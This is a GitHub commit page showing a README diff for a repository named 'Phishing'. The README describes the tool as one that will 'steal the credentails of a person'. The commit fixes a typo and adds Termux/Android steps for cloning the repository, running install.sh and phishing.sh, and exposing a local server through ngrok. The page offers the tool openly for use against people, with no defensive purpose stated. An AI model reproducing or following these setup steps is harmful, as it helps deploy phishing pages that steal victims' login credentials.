We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 95496e0 commit 9e1c263Copy full SHA for 9e1c263
README.md
@@ -7,15 +7,21 @@ This tool will steal the credentails of a person
7
- sudo chmod 777 *
8
- bash phishing.sh
9
10
-# Steps run this tool on mac:
+# Steps to run this tool on mac:
11
- git clone https://github.com/krishpranav/Phishing
12
- cd Phishing
13
14
- open a new terminal and type ./ngrok http 80
15
16
- if you have any doubt means check out reference down below
17
18
-
+# Steps to run this tool on android(termux):
19
+- pkg update
20
+- pkg install git
21
+- git clone https://github.com/krishpranav/Phishing
22
+- cd Phishing
23
+- bash install.sh
24
+- bash phishing.sh
25
26
27
# Reference
0 commit comments